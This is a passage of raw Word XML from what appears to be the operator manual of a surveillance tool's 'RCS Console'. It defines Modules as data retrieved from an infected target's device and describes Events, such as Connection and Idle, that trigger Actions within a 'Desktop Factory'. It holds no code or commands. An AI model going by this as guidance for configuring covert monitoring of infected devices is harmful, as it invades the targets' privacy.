                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">To activate an Action, it must be called by an occurred </w:t>
            </w:r>
            <w:r w:rsidR="008D6039">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="310B0777" wp14:editId="0F2A30DB">
                  <wp:extent cx="590550" cy="56197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0550" cy="561975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00EE28E5" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">A Module is a specific type of data that can be retrieved from the infected </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00AB38DA" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Each Module can be activated or deactivated by an Action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE0121" w:rsidRDefault="00BE0121" w:rsidP="00BE0121">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows the 3 different </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types of </w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">elements and their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arrangement</w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by rows, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">within </w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dvanced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode configuration window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="003D3AED" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A29330A" wp14:editId="1F458DA2">
            <wp:extent cx="6120130" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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3672205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B41F1" w:rsidRPr="003B0583" w:rsidRDefault="008B41F1" w:rsidP="008B41F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="0010013A" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00A52C9B">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A52C9B">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console ] </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>peration #</w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="0059452D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1" w:rsidRPr="008B41F1">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRPr="00B965F4" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRPr="00240B6F" w:rsidRDefault="000450A6" w:rsidP="00240B6F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc372642487"/>
      <w:r w:rsidRPr="00240B6F">
        <w:lastRenderedPageBreak/>
        <w:t>Desktop Events Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="000450A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00476149" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By clicking on the button Add Event</w:t>
      </w:r>
      <w:r w:rsidR="00D86157">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C6270B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you can add a new element in the line of Events</w:t>
      </w:r>
      <w:r w:rsidR="00D86157">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000843EC" w:rsidRDefault="000843EC" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within a Desktop Factory there’re 8 different Events available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000843EC" w:rsidRDefault="000843EC" w:rsidP="00785BC7">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56"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00446F09" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId81" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1446455250" r:id="rId82"/>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Connection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00B44323" w:rsidP="00B44323">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B44323">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Connection </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00B44323">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ven</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00B44323">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00B44323">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent finds an active </w:t>
            </w:r>
            <w:r w:rsidRPr="00B44323">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>con</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nection on the specified network resource (IP address, netmask and port).</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId83" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1036" DrawAspect="Content" ObjectID="_1446455251" r:id="rId84"/>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Idle</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00446F09" w:rsidP="00446F09">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Idle </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">doesn’t </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">interact with the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">for a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">specific </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>period of time.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId85" o:title=""/>
                </v:shape>
